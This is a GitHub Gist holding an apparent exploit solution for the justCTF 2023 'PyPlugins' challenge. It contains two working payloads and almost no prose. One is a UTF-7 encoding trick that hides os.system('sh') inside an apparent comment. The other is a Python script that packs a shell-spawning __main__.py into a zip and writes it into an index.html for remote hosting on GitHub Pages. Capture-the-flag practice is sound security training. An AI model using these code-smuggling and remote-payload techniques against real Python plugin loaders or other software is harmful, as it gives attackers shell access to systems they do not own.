Last active
June 4, 2023 22:57
-
-
Save lebr0nli/0837d0c3822c76586fa6582e891a1514 to your computer and use it in GitHub Desktop.
justCTF 2023 - PyPlugins (misc + pwn)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# encoding: utf-7 | |
# a+AAo-import os;os.system('sh') | |
# upload this file as index.html to your github pages |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import tempfile | |
import zipfile | |
def create_zip_payload() -> bytes: | |
file_name = "__main__.py" | |
file_content = b'import os;os.system("/bin/sh")' | |
with tempfile.TemporaryFile(suffix=".zip") as f: | |
with zipfile.ZipFile(f, "w") as z: | |
z.writestr(file_name, file_content) | |
f.seek(0) | |
return f.read() | |
def main() -> None: | |
print(create_zip_payload()) | |
with open("index.html", "w") as f: | |
f.write(f"pwn={create_zip_payload()!r}") | |
if __name__ == "__main__": | |
main() | |
# then upload the index.html file to your github pages |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment